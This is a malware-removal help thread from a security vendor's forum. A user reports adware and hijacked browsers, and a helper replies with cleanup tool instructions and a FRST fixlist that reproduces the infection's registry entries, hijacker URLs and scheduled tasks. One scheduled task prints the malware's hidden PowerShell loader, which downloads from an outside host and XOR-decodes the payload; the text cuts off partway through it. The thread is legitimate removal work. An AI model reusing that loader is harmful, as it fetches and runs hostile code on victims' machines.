ajdebenedictis 0 Posted February 18, 2016 Report Share Posted February 18, 2016 Hi Emsisoft technicians, I recently installed Windows 10 on my computer in January 2016 and shortly after, I got a virus. I believe I may have obtained the virus when I clicked on updated Skye link, as I uninstalled Skype from my computer, however, In Task Manager, I still see a Microsoft Skype. I do not know if Skype was developed or maintained by Microsoft. I am receiving multiple pop-up messages and advertisements, software is being loaded onto my computer, and pop-ups and new web browser tabs keep opening up no matter whether I am using Windows Edge or Madzilla Firefox. Eventually, the web browser turns gray and locks up preventing me from doing anything. I ran the Emsisoft Emergency Kit (EEK) virus scanner and the Farbar Recovery Scan Tool (FRST). I attached the reports to this memo. There are 2 files and I am especially concerned about. This files are: bsdriver.sys cherimoya.sys Both files above are located in the following folder: C:\Windows\System32\Drivers I need administrative rights to delete this files, however, no matter what I do, I cannot delete these files. I even created an Administrative login account, which did not help. I understand that Emisosft does not provide help to obtain administrative rights. How may I go about obtaining administrative rights? Do you know who I may contact who may be able to help me? How can I prove my computer is rightfully mine? I researched the entries on the Emsisoft web sight, but was not able to find anything related to my problems. I also did a few searches, but was not able to find the information needed to remove the Malware that I have on my computer. If such tread already exists that explains how I may remove the Malware, please let me know which ones may help me. I believe that nothing will help me until I obtain administrative rights to remove the files downloaded by the Malware virus. Please look at the attached reports that were created when I ran the Emsisoft Emergency Kit (EEK) and the Farbar Recovery Scan Tool (FRST) and let me know what I need to do to remove the Malware from my computer. Please let me know if you need any additional information. I would greatly appreciate your assistance. Addition.txt FRST.txt scan_160217-183742.txt Link to post Share on other sites
Kevin Zoll 309 Posted February 18, 2016 Report Share Posted February 18, 2016 Do the following: Download AdwCleaner and save it on your desktop. Close all open programs and Internet browsers (you may want to print our or write down these instructions first). Double click on adwcleaner.exe to run the tool. Click on the Scan button. After the scan has finished, click on the Clean button. Confirm each time with OK. You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop. Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer. Download Junkware Removal Tool and save it on your desktop.Run the tool by double-clicking it. The tool will open and start scanning your system. Please be patient as this can take a while to complete depending on your system's specifications. On completion, a log is saved to your desktop and will automatically open. Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply. Copy the below code to Notepad; Save As fixlist.txt to your Desktop.HKLM-x32\...\Run: [mpck_us_017010207] => [X] HKLM-x32\...\Run: [ospd_us_037010239] => [X] HKLM-x32\...\Run: [oasi_en_066020241] => [X] HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [Birds] => C:\Users\Albert\AppData\Local\Birds\birds365.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [Windi] => C:\ProgramData\DataFile\Windi.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [Itibiti.exe] => C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe HKU\S-1-5-21-32271450-1060499967-3261820355-1001\...\Run: [CrashService] => "C:\Users\Albert\AppData\Local\BoBrowser\Application\crash_service.exe" --max-reports=50 --no-window HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj6YamLW4mQvWWqwdHfGpNZb_UC8RdJA0avf3B_FSg3QXYGcuegU68e_HrbqFTo8hU8Enjb5lsvARdSNAsjI9x0XsgYfE, HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> DefaultScope {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://www.trovi.com/Results.aspx?gd=&ctid=CT3320133&octid=EB_ORIGINAL_CTID&ISID=M946F9A01-90D4-44C9-8872-4F7C3D1541EA&SearchSource=58&CUI=&UM=8&UP=SPD69C94D0-81AA-4588-9055-EE8D77975EE2&D=011416&q={searchTerms}&SSPV= SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfV9dUVoTQgUUbQ4LUQtcFQ1BchQAWVoQDFQUeFgBVl9ARQNBeB9aFQQTSEcFME0FCFwEURNNfWpdAEsSSWJGInJWDk4=&q={searchTerms} SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {187E1DF6-DFD0-4217-B13D-6069A2CE3B70} URL = hxxp://www-mysearch.com/s.ashx?prd=opensearch&q={searchTerms}&s=G2Fzftptn095001,46b42c9a-c2ab-48f3-88cf-c6115551b0b1, SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {398B2D84-6A60-43BD-9832-6B70D8E6F841} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=G2Fzftpbl2,edf3912e-2678-4f05-b13c-8b84d60c8675, SearchScopes: HKU\S-1-5-21-32271450-1060499967-3261820355-1001 -> {ielnksrch} URL = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O_xk1hzD7q8CJdfG0_wmo_zO-EX041lAiE5X2okAdT-6l99KdJpjt5d7otashMPAHkqm4Msaxhbuuj5ch6AYbhTtP3PTF-J_yhCQlzM800KQctc3WmRnsNe278MkfBhKSZadA-S7MzZhRrDnNKr8tmxHVkpKapttMNKuPrNcE,&q={searchTerms}Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File BHO-x32: Search Web Know -> {3beacc4a-b617-4519-bb20-e5970414cbe4} -> C:\Program Files (x86)\Search Web Know\Extensions\3beacc4a-b617-4519-bb20-e5970414cbe4.dll => No File BHO-x32: Oasis Space 1.0.0.7 -> {567dbf58-4713-45f4-a623-e7b41f898209} -> C:\Program Files (x86)\Oasis Space\OasisSpacebho.dll => No FileFramework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => No File StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartpageing.com/?type=sc&ts=1452823320&z=f959342320f8bfa8cd09b0eg8zawao6b8o6c3c1g1g&from=cmi&uid=WDCXWD5000LPVX-60V0TT0_WD-WXE1E24VM102VM102 S2 Oseozg; "C:\Users\Albert\AppData\Roaming\MerjBub\Gonceep.exe" -cms [X] S2 pclient; "C:\Program Files\pclient\pclient.exe" /s iid=4866725 did=APSFImali sid=3 ref=17682ede-e21f-213a-91da-e7e0f69ac9e8-PolicyMac id=f6df92e0a5c0d75900546ee7cf11b4825800009ec553df840e1f184bc0ffcdc7 [X] S2 Sorkicgo; "C:\Users\Albert\AppData\Roaming\NaopwPubn\Cogbat.exe" -cms [X] S2 SynTPEnhService; "C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe" [X] S2 Update Checked List; "C:\Program Files (x86)\Checked List\updateCheckedList.exe" [X] S2 Update Simple for You; "C:\Program Files (x86)\Simple for You\updateSimpleforYou.exe" [X] S2 Util Great Hub; "C:\Program Files (x86)\Great Hub\bin\utilGreatHub.exe" [X] S2 WajaNetEn Monitor; "C:\Program Files\WajaNetEn\0ccd4704b83ea0dacf1d0f37b241054e.exe" [X] S2 wucotusy; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\hnsdF359.tmp [X] S2 xycewozozbt; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\knsl3B77.tmp [X] S2 zutuzuni; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\jnszCEA9.tmp [X] S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X] S1 {0ae6a885-0fb1-4244-a055-126ed790cca7}Gw64; system32\drivers\{0ae6a885-0fb1-4244-a055-126ed790cca7}Gw64.sys [X] S1 {29ceb117-5e62-490b-8e5d-97f7ec432220}Gw64; system32\drivers\{29ceb117-5e62-490b-8e5d-97f7ec432220}Gw64.sys [X] S1 {2a6b0fdc-8815-4aa5-a061-069d6db3f642}Gw64; system32\drivers\{2a6b0fdc-8815-4aa5-a061-069d6db3f642}Gw64.sys [X] S1 {f0d54446-7cd7-458a-8a86-e54cb3c15f3d}Gw64; system32\drivers\{f0d54446-7cd7-458a-8a86-e54cb3c15f3d}Gw64.sys [X] 2016-02-17 20:01 - 2016-02-17 20:01 - 00000000 ____D C:\ProgramData\08fec31f-6735-1 2016-02-17 18:10 - 2016-02-17 18:10 - 00003256 _____ C:\WINDOWS\System32\Tasks\Run_Bobby_Browser 2016-02-17 18:09 - 2016-02-18 07:54 - 00000000 ____D C:\Users\Albert\AppData\Local\BoBrowser 2016-02-17 18:09 - 2016-02-17 18:30 - 00000000 ____D C:\Users\Albert\AppData\Roaming\PefdFabebak 2016-02-17 18:09 - 2016-02-17 18:09 - 00022716 _____ C:\WINDOWS\System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B} 2016-02-17 16:42 - 2016-02-17 16:42 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner 2016-02-16 15:58 - 2016-02-16 15:58 - 00000000 ____D C:\WINDOWS\system32\sin 2016-02-16 15:43 - 2016-02-16 15:43 - 00000000 ____D C:\WINDOWS\system32\oce 2016-02-16 14:30 - 2016-02-16 14:30 - 00000000 ____D C:\WINDOWS\system32\luek 2016-02-16 10:21 - 2016-02-16 10:21 - 00000000 ____D C:\WINDOWS\system32\pao 2016-02-16 10:07 - 2016-02-16 10:07 - 00000000 ____D C:\WINDOWS\system32\biv 2016-02-16 10:02 - 2016-02-16 10:02 - 00000000 ____D C:\WINDOWS\system32\eou 2016-02-16 09:56 - 2016-02-16 09:56 - 00000000 ____D C:\WINDOWS\system32\oci 2016-02-16 09:53 - 2016-02-17 16:00 - 00000000 ____D C:\ProgramData\Browser 2016-02-16 09:47 - 2016-02-16 09:47 - 00000000 ____D C:\WINDOWS\system32\jyoj 2016-02-16 04:31 - 2016-02-16 04:31 - 00000000 ____D C:\WINDOWS\system32\jij 2016-02-16 04:23 - 2016-02-16 04:23 - 00000000 ____D C:\WINDOWS\system32\teh 2016-02-16 03:46 - 2016-02-16 03:46 - 00000000 ____D C:\WINDOWS\system32\cokb 2016-02-16 03:32 - 2016-02-16 03:32 - 00000000 ____D C:\WINDOWS\system32\kijh 2016-02-16 02:51 - 2016-02-16 02:51 - 00000000 ____D C:\WINDOWS\system32\gaf 2016-02-16 02:36 - 2016-02-16 03:25 - 00000000 ____D C:\Program Files\shopperz160220160808 2016-02-16 02:36 - 2016-02-16 02:36 - 00003398 _____ C:\WINDOWS\System32\Tasks\Afefph 2016-02-16 02:34 - 2016-02-17 16:00 - 00000000 ____D C:\Program Files (x86)\DailyPcClean Support 2016-02-16 02:34 - 2016-02-16 02:34 - 00000000 ____D C:\Users\Albert\Documents\DailyPCClean 2016-02-16 02:31 - 2016-02-17 16:00 - 00000000 __SHD C:\Users\Albert\AppData\Local\winone 2016-02-16 02:31 - 2016-02-16 02:32 - 00000000 __SHD C:\Users\Albert\AppData\Local\Dynamation 2016-02-16 02:31 - 2016-02-16 02:32 - 00000000 ___HD C:\Users\Albert\AppData\Local\One10_PC_CleanerUn 2016-02-16 02:31 - 2016-02-16 02:31 - 00000000 ___HD C:\Users\Albert\AppData\Local\SatakMalwareBusterSetup 2016-02-16 01:56 - 2016-02-16 01:56 - 00000000 ____D C:\Users\Albert\AppData\Local\ElevatedDiagnostics 2016-02-16 01:38 - 2016-02-16 01:38 - 00000000 _____ C:\places.sqlite 2016-02-15 18:49 - 2016-02-15 18:49 - 00000000 ____D C:\WINDOWS\system32\sonq 2016-02-15 18:36 - 2016-02-16 09:53 - 00003520 _____ C:\WINDOWS\System32\Tasks\Muueguehnlaek 2016-02-15 18:36 - 2016-02-15 18:36 - 00000000 ____D C:\ProgramData\Muueguehnlaek 2016-02-15 18:30 - 2016-02-18 09:35 - 00000350 ____H C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job 2016-02-15 18:30 - 2016-02-18 09:35 - 00000350 ____H C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job 2016-02-15 18:30 - 2016-02-15 18:30 - 00003428 _____ C:\WINDOWS\System32\Tasks\VJBJMDRJBRJCQACG 2016-02-15 18:30 - 2016-02-15 18:30 - 00003428 _____ C:\WINDOWS\System32\Tasks\NPSEYLEPFCUWGUQR 2016-02-15 18:29 - 2016-02-17 17:06 - 00000000 ____D C:\Program Files\shopperz150220161159 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\Service1291 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\Service1104 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\28341ff220e0446c9fff27c4493d622e 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 ____D C:\ProgramData\19a87fa1ec024bbcbb41931263354405 2016-02-15 18:29 - 2016-02-15 18:29 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results 2016-02-17 16:43 - 2016-02-17 16:43 - 7950848 _____ () C:\Users\Albert\AppData\Roaming\agent.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0054272 _____ () C:\Users\Albert\AppData\Roaming\ApplicationHosting.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0062976 _____ () C:\Users\Albert\AppData\Roaming\Config.xml 2016-02-17 16:42 - 2016-02-17 16:42 - 0017472 _____ () C:\Users\Albert\AppData\Roaming\InstallationConfiguration.xml 2016-02-17 16:42 - 2016-02-17 16:42 - 0126976 _____ () C:\Users\Albert\AppData\Roaming\Installer.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0126464 _____ () C:\Users\Albert\AppData\Roaming\lobby.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0018432 _____ () C:\Users\Albert\AppData\Roaming\Main.dat 2016-02-17 16:43 - 2016-02-17 16:43 - 0005568 _____ () C:\Users\Albert\AppData\Roaming\md.xml 2016-02-17 16:43 - 2016-02-17 16:43 - 1881607 _____ () C:\Users\Albert\AppData\Roaming\Newfan.tst 2016-02-17 16:43 - 2016-02-17 16:43 - 0126464 _____ () C:\Users\Albert\AppData\Roaming\noah.dat 2016-02-17 16:42 - 2016-02-17 16:42 - 0848437 _____ () C:\Users\Albert\AppData\Roaming\S-Tip.bin 2016-02-17 16:42 - 2016-02-17 16:42 - 0188672 _____ () C:\Users\Albert\AppData\Roaming\Techzap.bin 2016-02-17 16:43 - 2016-02-17 16:43 - 0072806 _____ () C:\Users\Albert\AppData\Roaming\Tipin.tst 2016-02-17 16:43 - 2016-02-17 16:43 - 0032038 _____ () C:\Users\Albert\AppData\Roaming\uninstall_temp.ico 2016-01-14 22:43 - 2016-01-26 11:47 - 0000093 _____ () C:\Users\Albert\AppData\Roaming\WB.CFG 2015-03-06 19:33 - 2015-11-14 16:19 - 0007606 _____ () C:\Users\Albert\AppData\Local\resmon.resmoncfg 2016-02-15 18:30 - 2016-02-15 18:30 - 0002560 _____ () C:\Users\Albert\AppData\Local\uninstall.exe 2016-01-15 00:14 - 2016-01-15 00:14 - 0000135 _____ () C:\Users\Albert\AppData\Local\updt.js 2016-01-14 21:03 - 2016-01-14 21:03 - 0000074 _____ () C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\Users\Albert\AppData\Local\Temp\compete.exe C:\Users\Albert\AppData\Local\Temp\diam18525.exe Task: {0064C8EA-67E0-4457-BD69-32D599E3C1EF} - System32\Tasks\Tionhelf => C:\PROGRA~1\SHOPPE~1\Ivafbie.bat Task: {2084E9B9-858D-4A3A-9312-521FB19716EE} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION Task: {4042D5AE-8749-4590-92C6-492AA614E28F} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION Task: {54019748-4CDB-41E3-860B-E701E3C8FEF8} - System32\Tasks\NPSEYLEPFCUWGUQR => C:\ProgramData\Service1104\Service1104.exe [2016-02-15] () <==== ATTENTION Task: {57777FB8-CC07-4567-9CD4-53072709F25C} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION Task: {5C6C3B2B-DE18-44F3-8CEB-160233F5E746} - System32\Tasks\Afefph => C:\PROGRA~1\SHOPPE~2\Jabloxia.bat Task: {6D022E8A-F563-4BB6-9347-5DDA2D258152} - System32\Tasks\{9F779DF3-D491-4CB4-BB47-26D3DA7EB4A9} => pcalua.exe -a "C:\Program Files (x86)\onlysearch\onlysearch\1.4.2.4\onlysetup.exe" -c /uninstl Task: {88006AD2-3895-42CC-B38D-84A2850B48AA} - System32\Tasks\crash_service => C:\Users\Albert\AppData\Local\BoBrowser\Application\crash_service.exe <==== ATTENTION Task: {88AE8E82-77F9-4332-9850-A7A03DB62A15} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION Task: {90B854D9-6B12-416F-B8BB-C5BF4B291E72} - System32\Tasks\Run_Bobby_Browser => C:\Users\Albert\AppData\Local\BoBrowser\Application\bobrowser.exe <==== ATTENTION Task: {954ECB1A-5683-4DFB-BA1D-2683F8F031AC} - System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand $ E r r o r A c t i o n P r e f e r e n c e = " s t o p " ; $ s c = " S i l e n t l y C o n t i n u e " ; $ W a r n i n g P r e f e r e n c e = $ s c ; $ P r o g r e s s P r e f e r e n c e = $ s c ; $ V e r b o s e P r e f e r e n c e = $ s c ; $ D e b u g P r e f e r e n c e = $ s c ; 
 f u n c t i o n   s r ( $ p ) { $ n = " W i n d o w P o s i t i o n " ; t r y { N e w - I t e m   - P a t h   $ p | O u t - N u l l ; } c a t c h { } t r y { N e w - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - P r o p e r t y T y p e   D W O R D   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } 
 c a t c h { t r y { S e t - I t e m P r o p e r t y   - P a t h   $ p   - N a m e   $ n   - V a l u e   2 0 1 3 2 9 6 6 4 | O u t - N u l l ; } c a t c h { } } } s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ W i n d o w s P o w e r S h e l l _ v 1 . 0 _ p o w e r s h e l l . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ % S y s t e m R o o t % _ S y s t e m 3 2 _ s v c h o s t . e x e " ) ; s r ( " H K C U : \ C o n s o l e \ t a s k e n g . e x e " ) ; 
 $ s u r l = " h t t p : / / s o f t p i c k r i g h t . n e t / u / ? a = A I L y q 3 U B o 3 e O o c k 9 1 I u J v T a j k k 4 - a I 8 - j _ a j g R T I G V s p F 4 x h _ V T Q P m B 0 c w w c I G 1 j d H 8 w J A B 0 n o D _ g 8 q q z F f O V T E j 6 x j l a K X I E j o H n s s 6 x C U s k H f b X A _ J j P s y - v H 6 I m F 3 D - U 4 I m k 7 G t k _ 8 R X r O B Y t 5 t g _ C p 9 3 l M u V 8 T - d Y r v e 4 m G p y 3 4 L r 4 P b 3 q Y l A k - p 8 k 4 u X h 9 6 - w g l d B p D t 7 S w c P M M 2 5 w F R p P N X Z 6 w k w K 3 w O 7 A t w R z N r j G S B w a T a X 6 R U 8 m 0 5 F g A V y h x P 2 S G Y i C i 2 C o U K Q 6 q U W l 9 P Y i I e 4 e J y U l u 0 3 e 6 y b y 9 r j H n k j B K _ S f a 3 f 8 s 9 5 M 6 h n h r r b p T d 0 y o 8 X N g J p 8 r N d I N V F y Z 6 Y d Q _ f C q x R I m r q B 4 6 S z B 5 u 0 V J o D m i u O D E B C W e g v U 3 A A - G f x X D C T r A x 1 5 Z P K - q j 2 f 1 Y P w O L S w S E M 3 V t 0 K T p r S y X i 6 X n a Y o g S 8 _ l Q w h H 3 y Q v T D T W k H A d H _ E 8 W v m E r z I P P j 4 v K 5 L s c O n s O M a E 4 L S v m 1 k p U G u 6 U O J V D K x g T c y p 3 V o N d Q X k q S f r M q O J C 3 3 0 9 W v r G H Y - G f w T L B Y h J p M e i p x d F k O P q u l _ b V s q x f Y Y 4 3 i M 4 6 h r 7 V M G i q V G P G k 5 e O C s B A w i U E h f x Q x r N s H e R l D u k n z g u O F c g 4 C M A F c a z Z p B H 5 3 P x q C x 8 v g a t P V 6 4 L N W E E 0 v z C 8 c B t b j K P W i e K t _ A W 9 - A A Q 4 P I F T L N 1 y T x h Q M - J o Y 9 j f J U U 7 m n P N w g x m 1 H A s Z D O I S n o d 0 E - 4 2 q I C Y z w 3 8 Z d 4 d R V B R m V M Y m u d d s d h m 1 q e z E M x S 0 s d c W v R e O 2 x s h 8 9 - C Z r 0 C J 8 y f 8 J 0 i 6 l 2 - D J 5 q J A T P t u A 7 E 5 3 4 T K C x 8 Q - d N u 4 c 6 r v E V b 0 y m a & c = R m D 2 h I w I L w A g 1 G c t M H R k k p s M w Z K 4 w e b 1 w I P a M Z 3 2 r Q u K Z V 0 W c P V B M 7 Z J o C 9 Q P T d 5 1 - i w N p m n C H D l 6 j M N o Z 6 W r n - l h Q g a s T Z G j 2 3 1 5 R T J L X I u j 3 f z o Z N F 0 J x d E D _ X W s s l 6 S e Y G d Y R v z 1 h q 5 8 J W n a 0 Q T h Y - J Y B n Q g U 1 7 p T Y o y G c P g 0 f c K i 6 j n z g b K 4 j X a o 4 X c L 4 c T K 9 p U M q f a 9 8 F S O V L K t C Z V t i A x - i 1 4 v o Y 8 C D w j D j A i 9 t E Z L W z U h R F n f n j 4 i U I S G Y L Z K v f A B t 0 Y k V M L U j b L I U 2 n G m T y e z V e h 0 O g m t L I u s 4 8 x n v G x I l I - S C j d B j h _ 2 c m U v i 2 z W s r H q T x Z L P R d _ 6 Q v C B R F R i 2 j 9 o p - O 2 F O 9 K O v a 2 P O n u S 6 5 3 S d B i v 4 A 8 1 W L w E e o L z W E 2 K t i R W c L f j 5 P K M Z p G K t E 8 r M r 5 J u e D 6 d 7 A N 3 W M k r 7 g B 7 W H B x g W K l D 8 X M C 8 g d R z 4 f 3 q Y _ O d 7 z E D X c p 5 s s l l q N i K 4 M q r b A d b 6 l e P o 5 0 x j V 4 P d R K z n 4 b I - L G T t s E q g H c 4 N w 8 b 6 R Q v S i O 7 q R O _ P W u a P x u 9 f l j I g 2 u v c F j C k o T _ y u N h y h G L s 8 u _ 9 b d _ A 2 m z 7 l 3 M i Y 7 s E v L f d U - Z 1 D t T 2 S d x w G 9 D L r N 0 - W I b A R 8 f a P e o 9 T k o m 6 L X e S S O - N 5 r K f 2 g l c d I P n P Z N e u r B U w I S S O J Q 5 1 Z v J Z q J 5 A T U i 2 m B 0 _ O 4 X B H L 5 w h r F r 8 1 D x T O K E y U h J W n v k D s J U Z X R Q Z D E C a J a 6 y f g 7 o L e S y J 3 H A 5 y K n g T p x L q m Z a j h h E O D 9 L T n f b M 0 O q o c I I c A H 2 e g 3 x 6 L C h d E r 6 r N 8 z s r g 6 R - 5 m X Q j b o T l 0 - G o M i N R j H _ t x L Y - Z A w z 9 x y U L k p M d 8 9 z G p R A W x n S 9 P 6 0 O i l x i 0 G b 6 v Q D X A h 9 P r p P g 3 W 6 f Y o 1 T O & r = 2 8 9 6 8 3 4 0 0 4 6 9 9 5 1 6 9 3 6 " ; $ s t s k = " { 7 A 0 4 0 8 4 7 - 0 B 7 A - 0 A 7 E - 0 C 1 1 - 0 F 7 9 0 B 7 D 1 1 0 B } " ; $ p r i d = " D N S U n l o c k e r " ; $ i n i d = " K B F E I I F D " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ; } } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; } 
 f u n c t i o n   w c ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; } 
 f u n c t i o n   d s t r ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ; } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; } 
